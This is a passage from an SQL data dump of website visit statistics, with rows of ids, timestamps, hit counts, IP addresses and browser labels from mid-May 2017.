1,1,0,0,'164.132.161.20','other'),(110974,1494995654,1,1,0,0,'164.132.161.18','other'),(110975,1494996135,1,1,0,0,'91.209.11.236','other'),(110976,1494996197,1,1,0,0,'91.196.178.68','firefox'),(110977,1494996491,2,1,1,0,'66.249.66.180',''),(110978,1494996492,1,0,1,0,'66.249.66.177',''),(110979,1494996744,1,0,1,0,'66.249.66.81',''),(110980,1494996938,1,1,0,0,'217.182.132.95','other'),(110981,1494997030,1,1,0,0,'164.132.161.94','other'),(110982,1494998256,1,1,0,0,'217.182.132.96','other'),(110983,1494998708,1,0,1,0,'66.249.66.84',''),(110984,1494998935,1,1,0,0,'217.182.132.21','other'),(110985,1494999043,1,1,0,0,'164.132.162.160','other'),(110986,1494999341,1,1,0,0,'51.255.65.52','other'),(110987,1494999489,1,1,0,0,'164.132.161.60','other'),(110988,1494999582,1,1,0,0,'217.182.132.85','other'),(110989,1494999788,1,1,0,0,'91.196.178.72','firefox'),(110990,1494999877,1,1,0,0,'137.74.207.119','other'),(110991,1495000143,1,1,0,0,'217.69.133.4','other'),(110992,1495000145,1,1,0,0,'217.69.133.203','other'),(110993,1495000577,1,1,0,0,'207.46.13.149','other'),(110994,1495000612,1,1,0,0,'164.132.161.69','other'),(110995,1495000647,1,0,1,0,'66.249.66.183',''),(110996,1495000664,1,1,0,0,'164.132.162.159','other'),(110997,1495000743,1,1,0,0,'91.196.178.68','firefox'),(110998,1495000754,1,1,0,0,'217.182.132.186','other'),(110999,1495000881,1,1,0,0,'51.255.65.18','other'),(111000,1495000903,1,1,0,0,'217.69.136.208','other'),(111001,1495000991,1,1,0,0,'217.182.132.184','other'),(111002,1495001029,1,1,0,0,'54.165.59.7','other'),(111003,1495001104,1,1,0,0,'8.29.198.27','other'),(111004,1495001185,1,1,0,0,'94.179.109.5','chrome'),(111005,1495001476,1,1,0,0,'51.255.65.70','other'),(111006,1495001603,1,1,0,0,'217.182.132.75','other'),(111007,1495001610,1,1,0,0,'51.255.65.15','other'),(111008,1495001801,2,2,0,0,'91.196.177.46','chrome'),(111009,1495002273,1,1,0,0,'91.196.178.68','firefox'),(111010,1495002314,1,0,1,0,'66.249.66.87',''),(111011,1495002378,1,1,0,0,'66.249.66.183','chrome'),(111012,1495002437,1,0,1,0,'66.249.66.84',''),(111013,1495002602,1,1,0,0,'164.132.161.51','other'),(111014,1495002622,1,1,0,0,'51.255.71.122','other'),(111015,1495002669,1,1,0,0,'51.255.65.18','other'),(111016,1495002986,1,1,0,0,'217.182.132.182','other'),(111017,1495003092,1,1,0,0,'212.22.215.137','chrome'),(111018,1495003108,1,1,0,0,'5.255.253.63','other'),(111019,1495003344,1,1,0,0,'164.132.161.32','other'),(111020,1495003605,1,1,0,0,'217.182.132.75','other'),(111021,1495003669,1,1,0,0,'91.196.178.39','chrome'),(111022,1495003723,1,1,0,0,'217.182.132.179','other'),(111023,1495003914,1,1,0,0,'91.196.178.68','chrome'),(111024,1495003991,1,1,0,0,'217.182.132.65','other'),(111025,1495004191,1,0,1,0,'66.249.66.183',''),(111026,1495004574,1,1,0,0,'85.90.201.158','chrome'),(111027,1495005170,1,1,0,0,'66.249.66.180','chrome'),(111028,1495005315,1,1,0,0,'91.196.177.46','firefox'),(111029,1495005407,1,1,0,0,'217.182.132.79','other'),(111030,1495005436,1,1,0,0,'37.55.150.178','firefox'),(111031,1495005463,1,1,0,0,'164.132.161.54','other'),(111032,1495005565,1,1,0,0,'91.196.178.71','firefox'),(111033,1495005725,1,1,0,0,'130.180.209.228','chrome'),(111034,1495005810,1,1,0,0,'217.182.132.182','other'),(111035,1495005858,2,2,0,0,'91.209.11.236','other'),(111036,1495005939,1,1,0,0,'91.196.178.99','firefox'),(111037,1495006381,1,1,0,0,'51.255.65.87','other'),(111038,1495006690,1,1,0,0,'46.200.222.2','chrome'),(111039,1495006860,1,1,0,0,'91.196.178.71','chrome'),(111040,1495006878,1,1,0,0,'217.182.132.15','other'),(111041,1495006917,1,1,0,0,'217.69.133.2','other'),(111042,1495007031,1,1,0,0,'91.196.178.68','chrome'),(111043,1495007202,1,0,1,0,'66.249.66.87',''),(111044,1495007302,1,1,0,0,'217.69.133.193','other'),(111045,1495007452,1,1,0,0,'91.209.11.236','other'),(111046,1495008523,2,2,0,0,'193.70.39.164','other'),(111047,1495009003,1,1,0,0,'77.120.100.245','other'),(111048,1495009294,1,1,0,0,'91.196.178.71','firefox'),(111049,1495009296,1,1,0,0,'194.44.144.18','chrome'),(111050,1495009823,1,1,0,0,'51.255.71.114','other'),(111051,1495009984,1,1,0,0,'137.74.207.102','other'),(111052,1495010050,1,1,0,0,'217.182.132.90','other'),(111053,1495010142,1,1,0,0,'217.182.132.170','other'),(111054,1495010166,1,0,1,0,'66.249.66.84',''),(111055,1495010413,1,1,0,0,'91.196.178.68','chrome'),(111056,1495010713,1,1,0,0,'217.182.132.63','other'),(111057,1495010976,1,1,0,0,'91.196.178.68','firefox'),(111058,1495011056,1,1,0,0,'217.182.132.57','other'),(111059,1495011093,1,1,0,0,'51.255.65.80','other'),(111060,1495011208,1,0,1,0,'68.180.228.186',''),(111061,1495011759,1,1,0,0,'51.255.65.63','other'),(111062,1495011792,1,0,1,0,'66.249.66.183',''),(111063,1495011795,1,1,0,0,'164.132.161.56','other'),(111064,1495011799,1,0,1,0,'66.249.66.87',''),(111065,1495011924,1,1,0,0,'8.29.198.25','other'),(111066,1495012039,1,1,0,0,'91.196.178.71','other'),(111067,1495012082,1,1,0,0,'91.196.178.68','chrome'),(111068,1495012147,1,1,0,0,'91.196.178.72','firefox'),(111069,1495012190,1,1,0,0,'51.255.65.42','other'),(111070,1495012725,1,1,0,0,'91.196.177.46','firefox'),(111071,1495012788,1,1,0,0,'91.196.178.99','firefox'),(111072,1495013297,1,1,0,0,'164.132.161.2','other'),(111073,1495013474,1,0,1,0,'66.249.66.183',''),(111074,1495013481,1,1,0,0,'51.255.65.9','other'),(111075,1495013492,1,1,0,0,'164.132.161.73','other'),(111076,1495013549,1,1,0,0,'91.196.178.68','chrome'),(111077,1495013572,1,1,0,0,'51.255.65.92','other'),(111078,1495014181,1,1,0,0,'51.255.65.11','other'),(111079,1495014228,1,1,0,0,'217.182.132.241','other'),(111080,1495014394,1,1,0,0,'164.132.161.81','other'),(111081,1495014614,1,1,0,0,'217.182.132.93','other'),(111082,1495014781,1,1,0,0,'130.180.219.57','firefox'),(111083,1495014963,1,1,0,0,'164.132.161.82','other'),(111084,1495015107,2,0,2,0,'66.249.66.87',''),(111085,1495015249,2,2,0,0,'91.209.11.236','other'),(111086,1495015335,1,1,0,0,'51.255.65.78','other'),(111087,1495015697,1,1,0,0,'164.132.161.3','other'),(111088,1495015890,1,1,0,0,'213.108.45.138','firefox'),(111089,1495015974,1,1,0,0,'217.182.132.178','other'),(111090,1495016450,1,1,0,0,'51.255.65.56','other'),(111091,1495016534,1,1,0,0,'51.255.65.55','other'),(111092,1495016709,1,1,0,0,'46.201.35.253','chrome'),(111093,1495016727,1,1,0,0,'164.132.161.8','other'),(111094,1495017270,1,1,0,0,'51.255.65.70','other'),(111095,1495018166,1,1,0,0,'51.255.65.34','other'),(111096,1495018637,1,1,0,0,'217.182.132.32','other'),(111097,1495018713,1,1,0,0,'193.104.178.200','firefox'),(111098,1495018749,1,1,0,0,'51.255.71.132','other'),(111099,1495019488,1,0,1,0,'66.249.66.87',''),(111100,1495019513,1,1,0,0,'217.69.133.194','other'),(111101,1495019716,1,1,0,0,'178.92.250.99','chrome'),(111102,1495020829,1,1,0,0,'51.255.71.127','other'),(111103,1495020936,1,1,0,0,'217.182.132.172','other'),(111104,1495022027,1,1,0,0,'95.108.179.15','other'),(111105,1495022331,1,1,0,0,'217.182.132.52','other'),(111106,1495022753,1,1,0,0,'8.29.198.26','other'),(111107,1495022769,1,1,0,0,'180.76.15.25','other'),(111108,1495023050,1,1,0,0,'164.132.161.18','other'),(111109,1495023167,1,1,0,0,'164.132.161.11','other'),(111110,1495023486,1,1,0,0,'217.182.132.78','other'),(111111,1495023999,1,1,0,0,'164.132.161.93','other'),(111112,1495024044,1,1,0,0,'217.182.132.182','other'),(111113,1495024126,1,1,0,0,'164.132.161.42','other'),(111114,1495024250,1,0,1,0,'68.180.231.24',''),(111115,1495024297,1,1,0,0,'37.145.10.63','msie'),(111116,1495024554,2,0,2,0,'66.249.66.177',''),(111117,1495025007,1,1,0,0,'217.182.132.25','other'),(111118,1495025029,1,1,0,0,'217.182.132.7','other'),(111119,1495025202,1,1,0,0,'91.196.178.68','chrome'),(111121,1495025255,1,1,0,0,'91.196.178.67','firefox'),(111122,1495025370,1,1,0,0,'164.132.161.89','other'),(111123,1495025492,1,0,1,0,'66.249.66.183',''),(111124,1495025565,1,0,1,0,'68.180.231.24',''),(111125,1495025611,1,1,0,0,'51.255.65.59','other'),(111126,1495025718,1,1,0,0,'212.2.144.192','chrome'),(111127,1495026149,1,1,0,0,'51.255.71.113','other'),(111128,1495026679,1,1,0,0,'217.182.132.62','other'),(111129,1495026765,1,1,0,0,'164.132.161.95','other'),(111130,1495027028,1,1,0,0,'164.132.161.84','other'),(111131,1495027077,2,2,0,0,'62.212.73.211','other'),(111132,1495027225,1,1,0,0,'164.132.161.86','other'),(111133,1495027302,1,1,0,0,'164.132.161.62','other'),(111134,1495027581,3,3,0,0,'91.209.11.236','other'),(111135,1495028035,1,1,0,0,'91.196.178.71','firefox'),(111136,1495028720,1,0,1,0,'66.249.66.84',''),(111137,1495028851,1,1,0,0,'91.209.11.236','other'),(111138,1495029233,1,1,0,0,'194.44.144.18','chrome'),(111139,1495029260,1,1,0,0,'91.196.178.68','chrome'),(111140,1495029342,1,1,0,0,'51.255.71.126','other'),(111141,1495029753,1,1,0,0,'128.74.244.48','msie'),(111142,1495030030,1,0,1,0,'66.249.66.87',''),(111143,1495030086,2,2,0,0,'91.209.11.236','other'),(111144,1495030206,1,1,0,0,'217.182.132.176','other'),(111145,1495030276,1,0,1,0,'66.249.66.84',''),(111146,1495030837,1,1,0,0,'193.104.178.200','firefox'),(111147,1495030880,1,1,0,0,'217.182.132.152','other'),(111148,1495031496,1,0,1,0,'66.249.66.177',''),(111149,1495032081,1,1,0,0,'40.77.167.59','other'),(111150,1495032388,1,0,1,0,'68.180.228.186',''),(111151,1495032442,1,1,0,0,'164.132.161.47','other'),(111152,1495032864,1,1,0,0,'217.182.132.80','other'),(111153,1495033344,1,1,0,0,'137.74.207.161','other'),(111154,1495033395,1,1,0,0,'51.255.65.46','other'),(111155,1495033581,1,1,0,0,'8.29.198.25','other'),(111156,1495033764,1,1,0,0,'217.182.132.5','other'),(111157,1495033795,1,1,0,0,'66.249.93.210','chrome'),(111158,1495033810,1,1,0,0,'164.132.161.41','other'),(111159,1495033914,2,0,2,0,'66.249.66.180',''),(111160,1495034117,1,1,0,0,'217.182.132.16','other'),(111161,1495034385,1,0,1,0,'68.180.231.24',''),(111162,1495034552,1,1,0,0,'164.132.161.36','other'),(111163,1495034775,1,0,1,0,'66.249.66.87',''),(111164,1495034807,1,0,1,0,'66.249.66.84',''),(111165,1495035253,1,1,0,0,'164.132.161.51','other'),(111166,1495035550,1,0,1,0,'66.249.66.81',''),(111167,1495035596,1,1,0,0,'216.244.66.237','other'),(111168,1495035784,1,1,0,0,'217.182.132.4','other'),(111169,1495036235,1,1,0,0,'217.69.133.60','other'),(111170,1495036381,1,1,0,0,'217.182.132.73','other'),(111171,1495036629,1,1,0,0,'137.74.207.110','other'),(111172,1495036700,1,0,1,0,'68.180.231.24',''),(111173,1495036766,1,0,1,0,'66.249.66.81',''),(111174,1495036870,1,1,0,0,'91.196.178.33','chrome'),(111175,1495037171,1,1,0,0,'91.209.11.236','other'),(111176,1495037387,1,1,0,0,'217.69.134.176','other'),(111177,1495037532,1,1,0,0,'164.132.161.70','other'),(111178,1495037959,2,0,2,0,'66.249.66.183',''),(111179,1495038047,1,1,0,0,'217.69.135.82','other'),(111180,1495038268,1,1,0,0,'217.182.132.186','other'),(111181,1495038570,1,1,0,0,'66.249.66.180','chrome'),(111182,1495038863,1,0,1,0,'66.249.66.84',''),(111183,1495038885,1,0,1,0,'66.249.66.177',''),(111184,1495039259,1,1,0,0,'51.255.65.58','other'),(111185,1495039330,1,1,0,0,'164.132.161.44','other'),(111186,1495039414,1,1,0,0,'51.255.71.121','other'),(111187,1495039558,1,1,0,0,'164.132.161.17','other'),(111188,1495039826,1,1,0,0,'91.209.11.236','other'),(111189,1495039877,1,0,1,0,'68.180.231.24',''),(111190,1495039951,1,1,0,0,'51.255.71.113','other'),(111191,1495040082,1,1,0,0,'164.132.162.160','other'),(111192,1495040557,1,1,0,0,'217.182.132.81','other'),(111193,1495040746,2,2,0,0,'91.209.11.236','other'),(111194,1495040834,1,1,0,0,'217.182.132.185','other'),(111195,1495040981,1,1,0,0,'217.182.132.156','other'),(111196,1495041163,1,1,0,0,'137.74.207.101','other'),(111197,1495041243,1,1,0,0,'164.132.161.3','other'),(111198,1495041478,1,1,0,0,'91.196.178.163','chrome'),(111199,1495042509,1,0,1,0,'66.249.66.177',''),(111200,1495042544,1,0,1,0,'66.249.66.81',''),(111201,1495042548,1,0,1,0,'66.249.66.84',''),(111202,1495042558,1,1,0,0,'64.62.210.39','chrome'),(111203,1495043084,1,1,0,0,'91.209.11.236','other'),(111204,1495043199,1,1,0,0,'51.255.71.129','other'),(111205,1495043244,1,1,0,0,'176.122.100.197','chrome'),(111206,1495043428,1,1,0,0,'217.182.132.77','other'),(111207,1495043498,1,1,0,0,'51.255.65.82','other'),(111208,1495043530,1,1,0,0,'66.249.66.81','chrome'),(111209,1495043598,1,1,0,0,'141.8.132.25','other'),(111210,1495043684,1,1,0,0,'51.255.65.24','other'),(111211,1495043788,1,0,1,0,'68.180.231.24',''),(111212,1495043951,1,1,0,0,'95.108.213.32','other'),(111213,1495043986,1,1,0,0,'91.209.11.236','other'),(111214,1495044355,1,1,0,0,'164.132.161.2','other'),(111215,1495044405,1,1,0,0,'8.29.198.25','other'),(111216,1495044440,2,0,2,0,'66.249.66.177',''),(111217,1495044584,1,1,0,0,'51.255.65.30','other'),(111218,1495045047,1,1,0,0,'51.255.65.8','other'),(111219,1495045473,1,0,1,0,'66.249.66.87',''),(111220,1495045703,1,0,1,0,'66.249.66.183',''),(111221,1495045734,1,0,1,0,'68.180.231.24',''),(111222,1495045796,1,1,0,0,'51.255.71.120','other'),(111223,1495046102,1,1,0,0,'217.182.132.82','other'),(111224,1495046408,1,1,0,0,'217.182.132.181','other'),(111225,1495046435,1,1,0,0,'91.209.11.236','other'),(111226,1495047478,1,0,1,0,'66.249.66.87',''),(111227,1495047587,1,1,0,0,'164.132.161.91','other'),(111228,1495047774,1,0,1,0,'66.249.66.183',''),(111229,1495047850,1,1,0,0,'164.132.161.2','other'),(111230,1495048053,1,1,0,0,'164.132.161.73','other'),(111231,1495048438,1,1,0,0,'164.132.161.97','other'),(111232,1495048991,1,1,0,0,'178.255.215.94','other'),(111233,1495049034,1,0,1,0,'66.249.66.81',''),(111234,1495049056,1,1,0,0,'164.132.161.16','other'),(111235,1495049128,1,1,0,0,'164.132.161.80','other'),(111236,1495049170,2,0,2,0,'66.249.66.87',''),(111237,1495049272,1,1,0,0,'51.255.65.19','other'),(111238,1495049680,1,1,0,0,'217.182.132.55','other'),(111239,1495049939,2,0,2,0,'66.249.66.81',''),(111240,1495050525,1,1,0,0,'164.132.161.22','other'),(111241,1495050542,1,1,0,0,'217.182.132.185','other'),(111242,1495050667,1,1,0,0,'95.132.5.204','firefox'),(111243,1495051148,1,0,1,0,'68.180.228.186',''),(111244,1495051256,1,1,0,0,'217.182.132.193','other'),(111245,1495051258,1,0,1,0,'66.249.66.84',''),(111246,1495052059,1,1,0,0,'164.132.161.60','other'),(111247,1495052173,1,1,0,0,'217.182.132.176','other'),(111248,1495052251,1,1,0,0,'217.182.132.68','other'),(111249,1495052328,1,1,0,0,'66.102.9.35','chrome'),(111250,1495053195,1,1,0,0,'188.32.138.43','msie'),(111251,1495053246,1,0,1,0,'66.249.66.81',''),(111252,1495053318,1,1,0,0,'51.255.71.129','other'),(111253,1495053761,1,0,1,0,'66.249.66.84',''),(111254,1495053818,2,0,2,0,'66.249.66.183',''),(111255,1495054073,1,1,0,0,'217.182.132.79','other'),(111256,1495054277,1,1,0,0,'217.182.132.94','other'),(111257,1495054449,1,1,0,0,'217.182.132.63','other'),(111258,1495054963,1,1,0,0,'217.182.132.6','other'),(111259,1495055009,1,1,0,0,'51.255.71.113','other'),(111260,1495055229,1,1,0,0,'217.182.132.94','other'),(111261,1495055231,1,1,0,0,'8.29.198.26','other'),(111262,1495055449,1,1,0,0,'137.74.207.120','other'),(111263,1495055466,2,0,2,0,'66.249.66.87',''),(111264,1495055698,1,1,0,0,'217.182.132.184','other'),(111265,1495056903,1,0,1,0,'66.249.76.135',''),(111266,1495057049,1,1,0,0,'164.132.161.90','other'),(111267,1495057314,1,1,0,0,'51.255.71.131','other'),(111268,1495057461,1,0,1,0,'68.180.231.24',''),(111269,1495057620,1,1,0,0,'164.132.161.96','other'),(111270,1495057966,1,1,0,0,'164.132.161.82','other'),(111271,1495057994,1,0,1,0,'66.249.76.113',''),(111272,1495058141,1,1,0,0,'51.255.65.60','other'),(111273,1495058726,1,1,0,0,'51.255.65.53','other'),(111274,1495058738,1,0,1,0,'66.249.66.81',''),(111275,1495058789,1,0,1,0,'66.249.76.137',''),(111276,1495058826,1,1,0,0,'51.255.65.25','other'),(111277,1495058866,1,1,0,0,'164.132.161.67','other'),(111278,1495059556,1,1,0,0,'164.132.162.158','other'),(111279,1495060045,1,0,1,0,'66.249.76.113',''),(111280,1495060311,1,0,1,0,'66.249.76.112',''),(111281,1495060702,1,1,0,0,'51.255.65.81','other'),(111282,1495061436,1,1,0,0,'37.112.235.10','msie'),(111283,1495061903,2,0,2,0,'66.249.76.135',''),(111284,1495061948,1,1,0,0,'217.182.132.65','other'),(111285,1495061971,1,1,0,0,'51.255.65.87','other'),(111286,1495062467,1,0,1,0,'66.249.66.87',''),(111287,1495062471,1,1,0,0,'5.165.247.129','msie'),(111288,1495062555,1,1,0,0,'51.255.65.95','other'),(111289,1495062934,1,0,1,0,'66.249.76.114',''),(111290,1495063115,1,1,0,0,'51.255.71.112','other'),(111291,1495063132,1,1,0,0,'164.132.161.43','other'),(111292,1495063328,1,1,0,0,'164.132.161.12','other'),(111293,1495063451,2,0,2,0,'66.249.76.137',''),(111294,1495063693,1,1,0,0,'188.244.33.208','msie'),(111295,1495063827,1,1,0,0,'51.255.65.45','other'),(111296,1495063870,1,1,0,0,'66.102.9.27','chrome'),(111297,1495064084,1,1,0,0,'51.255.65.34','other'),(111298,1495064164,1,1,0,0,'176.195.120.186','msie'),(111299,1495064271,1,0,1,0,'66.249.76.113',''),(111300,1495064358,1,1,0,0,'217.182.132.35','other'),(111301,1495064606,3,0,3,0,'66.249.76.112',''),(111302,1495064646,1,0,1,0,'66.249.76.137',''),(111303,1495065453,1,1,0,0,'164.132.161.45','other'),(111304,1495065844,1,0,1,0,'66.249.76.113',''),(111305,1495066058,1,1,0,0,'8.29.198.27','other'),(111306,1495066468,2,0,2,0,'66.249.76.112',''),(111307,1495066491,1,0,1,0,'68.180.231.24',''),(111308,1495066535,1,1,0,0,'164.132.161.37','other'),(111309,1495067049,1,1,0,0,'217.182.132.184','other'),(111310,1495067314,1,1,0,0,'51.255.65.7','other'),(111311,1495067521,1,0,1,0,'66.249.76.137',''),(111312,1495067755,2,2,0,0,'216.244.66.237','other'),(111313,1495068327,1,1,0,0,'180.76.15.139','other'),(111314,1495069342,1,1,0,0,'51.255.65.13','other'),(111315,1495069565,1,1,0,0,'66.249.66.81','chrome'),(111316,1495070350,1,1,0,0,'217.182.132.86','other'),(111317,1495070681,1,1,0,0,'51.255.71.118','other'),(111318,1495070708,2,0,2,0,'66.249.76.112',''),(111319,1495070789,1,1,0,0,'51.255.65.68','other'),(111320,1495071483,1,0,1,0,'66.249.76.137',''),(111321,1495071955,1,1,0,0,'40.77.167.59','other'),(111322,1495071997,2,0,2,0,'66.249.76.135',''),(111323,1495072091,1,1,0,0,'141.8.142.164','other'),(111324,1495072119,1,1,0,0,'157.55.39.152','other'),(111325,1495072392,1,1,0,0,'217.182.132.90','other'),(111326,1495072795,1,1,0,0,'217.182.132.68','other'),(111327,1495072956,1,1,0,0,'40.77.167.59','other'),(111328,1495073663,1,1,0,0,'217.182.132.93','other'),(111329,1495074151,1,1,0,0,'66.249.76.137','chrome'),(111330,1495074409,1,1,0,0,'217.182.132.151','other'),(111331,1495074413,1,0,1,0,'66.249.76.113',''),(111332,1495074468,1,0,1,0,'66.249.66.177',''),(111333,1495074488,1,1,0,0,'51.255.71.125','other'),(111334,1495075080,1,1,0,0,'164.132.161.56','other'),(111335,1495075331,1,1,0,0,'51.255.65.5','other'),(111336,1495076378,1,0,1,0,'66.249.76.131',''),(111337,1495076540,1,1,0,0,'66.249.76.131','chrome'),(111338,1495076583,1,1,0,0,'51.255.65.14','other'),(111339,1495076727,1,0,1,0,'66.249.76.113',''),(111340,1495076887,1,1,0,0,'8.29.198.27','other'),(111341,1495077410,1,1,0,0,'217.69.134.177','other'),(111342,1495077888,1,1,0,0,'217.69.134.185','other'),(111343,1495078240,1,1,0,0,'217.69.134.161','other'),(111344,1495078253,1,1,0,0,'217.182.132.14','other'),(111345,1495078396,1,1,0,0,'217.69.134.177','other'),(111346,1495078458,1,1,0,0,'164.132.161.54','other'),(111347,1495078463,1,1,0,0,'164.132.161.16','other'),(111348,1495078513,1,1,0,0,'217.182.132.186','other'),(111349,1495078529,1,1,0,0,'51.255.65.78','other'),(111350,1495078766,1,1,0,0,'137.74.207.109','other'),(111351,1495078927,1,0,1,0,'66.249.66.183',''),(111352,1495079038,1,0,1,0,'68.180.231.24',''),(111353,1495079288,1,1,0,0,'164.132.161.13','other'),(111354,1495079368,2,2,0,0,'95.134.117.244','chrome'),(111355,1495079606,1,1,0,0,'51.255.65.28','other'),(111356,1495079676,1,1,0,0,'51.255.65.5','other'),(111357,1495079753,1,0,1,0,'66.249.76.137',''),(111358,1495079761,1,1,0,0,'164.132.161.32','other'),(111359,1495079987,1,1,0,0,'164.132.161.14','other'),(111360,1495080385,1,1,0,0,'164.132.161.7','other'),(111361,1495081089,1,1,0,0,'217.182.132.34','other'),(111362,1495081138,1,1,0,0,'164.132.162.157','other'),(111363,1495081340,1,1,0,0,'217.182.132.27','other'),(111364,1495081625,1,1,0,0,'37.112.35.55','msie'),(111365,1495082054,1,1,0,0,'91.196.178.70','firefox'),(111366,1495082183,1,0,1,0,'66.249.66.81',''),(111367,1495082548,1,1,0,0,'217.182.132.82','other'),(111368,1495082658,1,1,0,0,'109.63.180.195','msie'),(111369,1495082979,1,1,0,0,'217.182.132.37','other'),(111370,1495083251,1,0,1,0,'66.249.76.135',''),(111371,1495083515,1,1,0,0,'163.172.108.151','chrome'),(111372,1495083684,1,1,0,0,'51.255.71.101','other'),(111373,1495083788,1,1,0,0,'217.182.132.52','other'),(111374,1495083907,1,1,0,0,'91.196.178.36','firefox'),(111375,1495084319,1,1,0,0,'176.195.120.186','msie'),(111376,1495084341,1,0,1,0,'66.249.76.135',''),(111377,1495084388,1,0,1,0,'66.249.76.112',''),(111378,1495084401,1,1,0,0,'51.255.65.18','other'),(111379,1495084610,1,1,0,0,'130.180.217.115','chrome'),(111380,1495084712,1,1,0,0,'164.132.161.56','other'),(111381,1495084816,1,1,0,0,'77.41.30.194','msie'),(111382,1495084860,1,1,0,0,'95.24.25.5','msie'),(111383,1495084990,1,1,0,0,'217.182.132.90','other'),(111384,1495085668,1,0,1,0,'66.249.66.177',''),(111385,1495085744,1,0,1,0,'66.249.66.180',''),(111386,1495086207,1,1,0,0,'151.80.27.116','other'),(111387,1495086697,1,1,0,0,'164.132.161.53','other'),(111388,1495086736,1,1,0,0,'51.255.71.123','other'),(111389,1495086807,1,1,0,0,'91.196.178.71','firefox'),(111390,1495087496,1,0,1,0,'68.180.231.24',''),(111391,1495087528,1,1,0,0,'164.132.161.26','other'),(111392,1495087714,1,1,0,0,'8.29.198.26','other'),(111393,1495087761,1,0,1,0,'66.249.66.177',''),(111394,1495087776,6,6,0,0,'91.121.109.55','other'),(111395,1495087918,1,1,0,0,'91.196.178.71','firefox'),(111396,1495088205,1,1,0,0,'51.255.71.131','other'),(111397,1495088213,2,2,0,0,'91.196.178.68','chrome'),(111398,1495088397,1,1,0,0,'51.255.64.106','other'),(111399,1495088680,1,0,1,0,'68.180.228.186',''),(111400,1495088691,1,0,1,0,'66.249.66.183',''),(111401,1495088701,1,0,1,0,'66.249.76.112',''),(111402,1495088721,1,0,1,0,'66.249.76.113',''),(111403,1495088741,1,0,1,0,'66.249.76.135',''),(111404,1495088756,1,0,1,0,'66.249.66.180',''),(111405,1495088783,1,1,0,0,'94.179.57.127','chrome'),(111406,1495089054,1,1,0,0,'212.2.144.192','chrome'),(111407,1495089120,1,1,0,0,'51.255.71.126','other'),(111408,1495089132,1,0,1,0,'66.249.76.114',''),(111409,1495089154,1,1,0,0,'51.255.71.133','other'),(111410,1495089313,1,1,0,0,'91.196.178.71','other'),(111411,1495089317,1,1,0,0,'37.55.226.218','chrome'),(111412,1495089984,1,1,0,0,'91.196.178.135','firefox'),(111413,1495090715,1,0,1,0,'68.180.231.24',''),(111414,1495090755,1,1,0,0,'164.132.162.154','other'),(111415,1495091320,1,0,1,0,'66.249.76.135',''),(111416,1495091743,1,1,0,0,'91.209.11.236','other'),(111417,1495091763,1,0,1,0,'68.180.231.24',''),(111418,1495091887,1,1,0,0,'51.255.65.2','other'),(111419,1495091890,1,1,0,0,'164.132.161.70','other'),(111420,1495092020,2,0,2,0,'68.180.228.186',''),(111421,1495092322,1,0,1,0,'66.249.66.177',''),(111422,1495092433,1,0,1,0,'66.249.76.135',''),(111423,1495092473,1,1,0,0,'217.182.132.96','other'),(111424,1495092608,1,1,0,0,'141.8.142.15','other'),(111425,1495092638,2,2,0,0,'91.196.178.163','chrome'),(111426,1495092768,1,0,1,0,'66.249.76.131',''),(111427,1495092892,2,2,0,0,'178.93.195.18','chrome'),(111428,1495092947,1,1,0,0,'51.255.65.4','other'),(111429,1495093056,1,1,0,0,'137.74.207.120','other'),(111430,1495093454,1,1,0,0,'82.207.91.234','firefox'),(111431,1495093504,1,0,1,0,'66.249.76.112',''),(111432,1495093542,1,1,0,0,'91.196.178.68','chrome'),(111433,1495093615,1,1,0,0,'51.255.65.76','other'),(111434,1495094038,1,1,0,0,'91.196.178.166','chrome'),(111435,1495094288,1,1,0,0,'217.182.132.148','other'),(111436,1495094336,1,1,0,0,'95.135.240.213','firefox'),(111437,1495094402,1,0,1,0,'66.249.76.113',''),(111438,1495094452,1,1,0,0,'91.196.178.68','firefox'),(111439,1495094553,1,1,0,0,'164.132.161.96','other'),(111440,1495094607,1,1,0,0,'91.196.178.71','other'),(111441,1495095112,1,1,0,0,'95.108.179.15','other'),(111442,1495095117,1,1,0,0,'141.8.142.15','other'),(111443,1495095222,1,0,1,0,'66.249.76.131',''),(111444,1495095245,1,1,0,0,'51.255.65.66','other'),(111445,1495095360,1,1,0,0,'164.132.161.3','other'),(111446,1495095894,3,3,0,0,'91.209.11.236','other'),(111447,1495095977,1,1,0,0,'91.196.178.68','chrome'),(111448,1495095985,1,1,0,0,'217.182.132.173','other'),(111449,1495096066,2,2,0,0,'91.196.178.68','firefox'),(111450,1495096096,1,1,0,0,'51.255.65.82','other'),(111451,1495096413,1,0,1,0,'68.180.231.24',''),(111452,1495096519,1,1,0,0,'109.236.81.168','chrome'),(111453,1495096575,1,1,0,0,'91.196.178.166','chrome'),(111454,1495096634,1,1,0,0,'51.255.65.31','other'),(111455,1495096847,1,1,0,0,'217.182.132.56','other'),(111456,1495097012,1,1,0,0,'130.180.219.6','chrome'),(111457,1495097184,1,1,0,0,'91.196.178.71','other'),(111458,1495097208,1,1,0,0,'91.196.178.68','firefox'),(111459,1495097435,1,1,0,0,'217.182.132.241','other'),(111460,1495097445,1,1,0,0,'91.196.178.71','chrome'),(111461,1495097736,1,0,1,0,'68.180.231.24',''),(111462,1495097885,1,1,0,0,'91.196.177.46','chrome'),(111463,1495098255,1,1,0,0,'91.196.178.68','firefox'),(111464,1495098259,1,1,0,0,'109.236.81.168','chrome'),(111465,1495098383,3,3,0,0,'91.209.11.236','other'),(111466,1495098533,1,1,0,0,'8.29.198.26','other'),(111467,1495098874,1,1,0,0,'217.182.132.240','other'),(111468,1495098945,1,1,0,0,'151.80.27.116','other'),(111469,1495098985,1,1,0,0,'164.132.161.84','other'),(111470,1495099087,1,1,0,0,'130.180.210.242','chrome'),(111471,1495099240,1,1,0,0,'217.182.132.20','other'),(111472,1495099323,2,0,2,0,'66.249.76.137',''),(111473,1495099672,1,0,1,0,'68.180.228.186',''),(111474,1495099776,1,1,0,0,'217.182.132.95','other'),(111475,1495099945,1,1,0,0,'217.182.132.31','other'),(111476,1495100059,1,1,0,0,'109.236.81.168','chrome'),(111477,1495100135,1,1,0,0,'91.209.11.236','other'),(111478,1495100199,1,1,0,0,'91.196.178.68','chrome'),(111479,1495100553,1,0,1,0,'66.249.66.81',''),(111480,1495101149,1,0,1,0,'66.249.76.113',''),(111481,1495101208,2,2,0,0,'91.209.11.236','other'),(111482,1495101317,1,0,1,0,'66.249.76.114',''),(111483,1495101496,1,1,0,0,'217.69.134.160','other'),(111484,1495101860,1,1,0,0,'109.236.81.168','chrome'),(111485,1495102074,2,2,0,0,'46.165.197.141','other'),(111486,1495102155,1,1,0,0,'217.182.132.4','other'),(111487,1495102379,1,0,1,0,'66.249.76.131',''),(111488,1495102390,1,0,1,0,'66.249.66.87',''),(111489,14